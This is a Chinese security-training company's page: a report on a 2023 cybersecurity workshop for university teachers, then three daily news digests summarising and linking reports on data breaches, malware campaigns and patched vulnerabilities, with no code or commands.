在课后研讨会上，各高校老师分享他们在本次研修班中学到的知识和技能，并结合自己所从事的课程建设和教学改革的实际情况进行探讨。这样的交流促使大家相互启发、借鉴和学习，为各自的教学工作提供新的思路和方法。老师们提出一系列富有见解的问题，也激发了与会者们的思考和讨论。 为了让参会老师更好地掌握所学知识，我们结合授课内容，组织了一次CTF现场体验赛，让参会老师体验真实的CTF攻防，在靶场中进行实际操作和解题，在挑战中获得深入的知识和实践经验，在实战中探索新的思维方式和解题思路。在课程答疑环节，老师们针对课程知识积极踊跃的向讲师提问，与知名国际战队讲师面对面互动交流。 在研修班课程结束后，蚁景科技销售部负责人宋小玲为大家带来了关于蚁景科技公司及产品的分享，得到了老师们的广泛认可。 2023网络安全高级研修班圆满落下帷幕，蚁景科技将持续为各大高校提供全方位的网安人才培养解决方案，感谢老师们对蚁景科技的信任与支持。 关于蚁景科技 01 蚁景网安实验室 蚁景科技旗下在线实验平台——蚁景网安实验室，现已形成成熟的学、训、赛三大体系；全方位覆盖了网络安全领域包括Web安全、渗透测试、CTF网络攻防、信息安全管理等1500+内容。丰富的课件库、快捷方便的教学环境、科学的知识图谱、清晰的学习路径，结合蚁景科技与各大高校开展实习实训的丰富经验，能为院校实习实训工作开展与教师网安教学效率的提升提供有力支持。 02 网安学院 除蚁景网安实验室以外，蚁景网安学院推出的网安实战技能培训课程，紧密贴合网安行业人才市场需求，助力学员在职场竞争中脱颖而出，欢迎更多学子参与进来。

1、美国政府承包商Serco遭遇数据泄露 https://www.bleepingcomputer.com/news/security/us-govt-contractor-serco-discloses-data-breach-after-moveit-attacks/ 跨国外包公司 Serco Group 的美洲分部 Serco Inc 披露了一起数据泄露事件，攻击者从第三方供应商的 MoveIT 托管文件传输 (MFT) 服务器窃取了 10,000 多人的个人信息。这些信息是从其福利管理提供商 CBIZ 的文件传输平台中泄露的。攻击中泄露的个人信息包括以下信息：姓名、美国社会安全号码、出生日期、家庭邮寄地址、Serco个人电子 2、Azure AD跨租户同步功能可被滥用于横向移动 https://www.bleepingcomputer.com/news/security/new-microsoft-azure-ad-cts-feature-can-be-abused-for-lateral-movement/ Microsoft 于 2023 年 6 月推出的新 Azure Active Directory 跨租户同步 (CTS) 功能创建了一个新的潜在攻击面，可能使威胁行为者更容易横向传播到其他 Azure 租户。Microsoft 租户是 Azure Active Directory 中的客户端组织或子组织，它们配置有自己的策略、用户和设置。由于大型组织可能出于 3、研究人员披露Rilide恶意软件的攻击活动 https://www.bleepingcomputer.com/news/security/chrome-malware-rilide-targets-enterprise-users-via-powerpoint-guides/ 研究人员披露Rilide Stealer恶意软件利用Chrome 浏览器扩展程序针对加密用户和企业员工进行网络攻击活动，旨在窃取凭证和加密钱包。Rilide 是基于 Chromium 的浏览器（包括 Chrome、Edge、Brave 和 Opera）的恶意浏览器扩展，最初于 2023 年 4 月发现。首次发现时，Rilide 浏览器扩展程序会冒充合法的 Goo 4、研究人员披露针对Linux系统的恶意软件Reptile https://asec.ahnlab.com/en/55785 研究人员披露Reptile恶意软件，是针对 Linux 系统的开源内核模块 Rootkit，可在 GitHub 上公开获取。Rootkit 是具有隐藏自身或其他恶意软件能力的恶意软件。Reptile恶意软件主要针对文件、进程和网络通信进行隐藏。该恶意软件的隐藏能力不仅包括其自身的内核模块，还包括文件、目录、文件内容、进程和网络流量。与其他通常仅提供隐藏功能的 Rootkit 恶意软件不同，Reptile恶意软件还具有反向shell功能，使攻击者能够轻松控制系统。 5、Mondee旅游公司存在安全漏洞导致数据泄露 https://techcrunch.com/2023/08/02/mondee-data-exposed-credit-cards-flight-itineraries/ Mondee旅游公司发现了一个有安全漏洞的数据库，该数据库泄露了敏感的客户信息，包括详细的航班和酒店行程以及未加密的信用卡号码。数据库在没有密码的情况下暴露在互联网上，使用网络浏览器即可访问其中的敏感数据。大部分数据与Mondee 子公司 TripPro有关，这是一个旅行社平台，数以万计的预订代理和旅游初创公司使用该平台，可以进行自助机票和酒店预订。 6、攻击者冒充NFT开发者窃取加密货币 https://www.ic3.gov/Media/Y2023/PSA230804 美国联邦调查局 (FBI) 今天警告称，诈骗者冒充非同质化代币 (NFT) 开发商，针对 NFT 爱好者进行掠夺，窃取他们的加密货币和 NFT 资产。此次攻击中，攻击者未经授权即可访问 NFT 开发者社交媒体帐户，或创建几乎相同的帐户来推广“独家”NFT 版本。通过这种方式，他们能够以“供应有限”的误导性说法来引诱目标，将促销活动标记为“惊喜”或之前未公开的代币，以诱导错误的紧迫感，并诱骗潜在受害者在没有适当检查的情况下仓促做出决定。受害者点击所提供的链接，则会被重定向到伪装成特定 NFT 项目的网络钓鱼网站 7、研究人员披露CloudflareD在野外的滥用 https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/ 研究人员发现一些攻击者已转向使用防御者可能在其网络中更常用的合法工具，从而降低了传统防病毒、EDR 和其他防御流程检测到的几率。研究人员发现使用的相对较新的合法工具：Cloudflare Tunnel，又称为Cloudflared。Cloudflared 会连接 Cloudflare 的边缘服务器，通过 HTTPS(HTTP2/QUIC) 创建出站连接，其中隧道的控制器使服务或专用网络可通过 Cloudflare 控制台进 8、未修补漏洞的PaperCut服务器面临远程代码执行攻击 https://www.bleepingcomputer.com/news/security/new-papercut-critical-bug-exposes-unpatched-servers-to-rce-attacks/ PaperCut 修复了其 NG/MF 打印管理软件中的一个严重安全漏洞，该漏洞允许未经身份验证的攻击者在未修补的 Windows 服务器上远程执行代码。该漏洞被追踪为CVE-2023-39143，是由研究人员发现的两条路径遍历漏洞造成的，这些漏洞使威胁参与者能够在不需要进行低复杂性攻击的情况下读取、删除和上传受感染系统上的任意文件。用户交互。 9、Clop勒索软件利用torrent以泄露数据 https://www.bleepingcomputer.com/news/security/clop-ransomware-now-uses-torrents-to-leak-data-and-evade-takedowns/ Clop 勒索软件组织再次改变勒索策略，现在使用 torrent 来泄露 MOVEit 攻击中窃取的数据。攻击者已经为 20 名受害者创建了 torrent 。作为这种新勒索方法的一部分，该勒索软件组织建立了一个新的 Tor 站点，提供有关如何使用 torrent 客户端下载泄露数据和 20 名受害者的磁力链接列表的说明。 10、Reptile Rootkit 被用于攻击韩国的 Linux 系统 https://securityaffairs.com/149203/malware/reptile-rootkit-south-korea.html 研究人员观察到威胁行为者正在使用名为 Reptile 的开源 rootkit 来针对韩国的系统进行攻击。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、新版 Rilide 数据盗窃恶意软件针对Chrome浏览器 网络安全研究人员发现了一种名为Rilide的新版本恶意软件，该恶意软件以基于 Chromium 的网络浏览器为目标，窃取敏感数据并窃取加密货币。该恶意软件具有广泛的功能，可以禁用其他浏览器加载项、收集浏览历史记录和 cookie、收集登录凭据、截取屏幕截图以及注入恶意脚本以从各种加密货币交易所提取资金。 2、研究人员发现可绕过最近修补的严重 Ivanti EPMM 漏洞 https://thehackernews.com/2023/08/researchers-discover-bypass-for.html 网络安全研究人员在某些版本的 Ivanti Endpoint Manager Mobile (EPMM) 中发现了最近修复的被主动利用的漏洞的绕过方法，促使 Ivanti 敦促用户更新到该软件的最新版本。 3、“孟加拉神秘团队”针对印度发起 DDoS 攻击和数据窃取 https://thehackernews.com/2023/08/mysterious-team-bangladesh-targeting.html 自 2022 年 6 月以来，一个名为“孟加拉国神秘团队”的黑客组织与超过 750 起分布式拒绝服务 (DDoS) 攻击和 78 起网站篡改事件有关。总部位于新加坡的网络安全公司 Group-IB 在与《黑客新闻》分享的一份报告中表示：“该组织最常攻击印度和以色列的物流、政府和金融部门组织。” “该组织主要受宗教和政治动机驱动。” 4、OWASP Top 10 for LLM（大型语言模型）1.0发布 https://securityaffairs.com/149124/security/owasp-top-10-for-llm.html OWASP 发布了OWASP Top 10 for LLM（大型语言模型）应用程序项目，该项目提供了影响LLM应用程序的 10 个最关键漏洞的列表。该项目旨在对开发人员、设计师、架构师、经理和组织进行有关部署大型语言模型 (LLM) 时的安全问题的教育。 5、俄罗斯 APT29 通过 Microsoft Teams 进行网络钓鱼攻击 https://securityaffairs.com/149103/apt/apt29-microsoft-teams-phishing-attacks.html 与俄罗斯有关的 APT29 组织针对全球数十个组织和政府机构发起 Microsoft Teams 网络钓鱼攻击。 6、CISA 呼吁紧急关注 UEFI 攻击面 https://www.securityweek.com/cisa-calls-urgent-attention-to-uefi-attack-surfaces/ 美国政府网络安全机构将 UEFI 描述为需要紧急安全关注的“关键攻击面”。 7、数十个 RCE 漏洞影响 Milesight 工业路由器 https://www.securityweek.com/dozens-of-rce-vulnerabilities-impact-milesight-industrial-router/ 思科 Talos 安全研究人员警告称，影响 Milesight UR32L 工业路由器的数十个漏洞可能被利用来执行任意代码或命令。 8、Chrome 115 更新修补 V8 和 WebAssembly 引擎中三个严重漏洞 https://www.securityweek.com/google-awards-60000-for-v8-vulnerabilities-patched-with-chrome-115-update/ 谷歌在其公告中指出，浏览器更新解决了 V8 JavaScript 和 WebAssembly 引擎中的三个高度严重的类型混淆错误，这些漏洞为报告研究人员赢得了超过 60,000 美元的漏洞赏金。 9、研究人员发现伪造的FlipperZero网站 https://www.bleepingcomputer.com/news/security/fake-flipperzero-sites-promise-free-devices-after-completing-offer/ Flipper Zero 是一款适合渗透测试人员和黑客爱好者的便携式多功能网络安全工具。该工具允许研究人员通过支持 RFID 仿真、数字访问密钥克隆、无线电通信、NFC、红外、蓝牙等来修补各种硬件。研究人员发现伪造的FlipperZero网站，此网站声称只需填写报价即可免费提供 Flipper Zero 设备。该网站冒充合法的官方网站，包括使用“版权 2023 - 10、网信办：处理超过百万人个人信息每年至少开展一次合规审计 https://www.freebuf.com/news/373750.html 为指导、规范个人信息保护合规审计活动，根据《中华人民共和国个人信息保护法》等法律法规，国家互联网信息办公室起草了《个人信息保护合规审计管理办法（征求意见稿）》（以下简称《管理办法》），现向社会公开征求意见。管理办法》提出，处理超过100万人个人信息的个人信息处理者，应当每年至少开展一次个人信息保护合规审计；其他个人信息处理者应当每二年至少开展一次个人信息保护合规审计。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、黑客已利用 CVE-2023-3519在 581 台 Citrix 服务器上安装了后门 https://securityaffairs.com/149094/hacking/citrix-servers-webshells-cve-2023-3519-attacks.html 研究人员警告称，在一场利用 RCE CVE-2023-3519 的持续攻击活动中，数百台 Citrix 服务器已遭到黑客攻击。 2、Salesforce 电子邮件服务中的零日漏洞被 Facebook 钓鱼活动利用 https://securityaffairs.com/149083/hacking/phishing-facebook-campaign-salesforce-zero-day.html 专家发现 Facebook 鱼叉式网络钓鱼活动利用 Salesforce 电子邮件服务中的零日漏洞。 3、Firefox 116 发布了 14 个 CVE 的补丁，修补了9个严重漏洞 https://www.securityweek.com/firefox-116-patches-high-severity-vulnerabilities/ Firefox 116 发布了 14 个 CVE 的补丁，其中包括 9 个高严重性漏洞，其中一些漏洞可能导致远程代码执行或沙箱逃逸。 4、研究人员发现 AWS SSM 代理被滥用为隐蔽远程访问木马 https://thehackernews.com/2023/08/researchers-uncover-aws-ssm-agent.html 网络安全研究人员在 Amazon Web Services (AWS) 中发现了一种新的后利用技术，该技术允许 AWS Systems Manager 代理（SSM 代理）作为远程访问木马在 Windows 和 Linux 环境中运行。 5、因“Vyper”漏洞，加密货币平台数百万美元被盗 https://therecord.media/millions-stolen-in-vyper-crypto-hack 黑客利用加密货币世界广泛使用的编程语言中的漏洞，从多个平台盗取价值数百万美元的加密货币。 6、挪威实体持续遭受利用 Ivanti EPMM 漏洞的攻击 至少自 2023 年 4 月以来，高级持续性威胁 (APT) 攻击者利用最近披露的影响 Ivanti Endpoint Manager Mobile (EPMM) 的严重缺陷作为零日漏洞，针对挪威实体（包括政府网络）发起攻击。 7、研究人员披露SpyNote安卓木马针对欧洲银行客户的攻击活动 https://www.cleafy.com/cleafy-labs/spynote-continues-to-attack-financial-institutions 研究人员在2023 年 6 月和 7 月检测到SpyNote安卓木马针对欧洲银行客户进行网络攻击。此恶意软件通过电子邮件网络钓鱼或网络钓鱼活动进行分发，攻击活动是通过远程访问木马 (RAT) 功能和网络钓鱼攻击相结合来执行的。SpyNote也称为 SpyMax，与其他安卓银行木马类似，它需要安卓的可访问权限，以便授予自身其他必要的权限并从受感染的设备收集敏感数据。此软件具有间谍软件和银行欺诈的双重功能。 8、攻击者滥用Google AMP进行网络钓鱼攻击 https://www.bleepingcomputer.com/news/security/threat-actors-abuse-google-amp-for-evasive-phishing-attacks 研究人员发现攻击者滥用 Google Accelerated Mobile Pages (AMP) 绕过电子邮件安全措施并进入企业员工的收件箱。Google AMP 是由 Google 与 30 个合作伙伴共同开发的开源 HTML 框架，旨在提高移动设备上网页内容的加载速度。AMP 页面托管在 Google 的服务器上，其中内容经过简化，并且预加载了一些较重的媒体元素。使用嵌入网络 9、谷歌再次警告将在12月开始删除不活跃的帐户 https://www.bleepingcomputer.com/news/google/google-warns-again-it-will-start-deleting-inactive-accounts-in-december/ 谷歌只会对两年内未使用或登录的帐户强制执行此规则，但会首先通知用户其帐户有资格删除。 10、Everlast被黑客入侵，客户信用卡被盗用 https://cybernews.com/security/everlast-hacked-credit-cards-compromised/ 美国知名拳击装备品牌Everlast最近被一个与世界上最大的网上银行抢劫案有关的网络团伙入侵。Cybernews研究小组发现，客户信用卡数据已被默默浏览至少三周。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。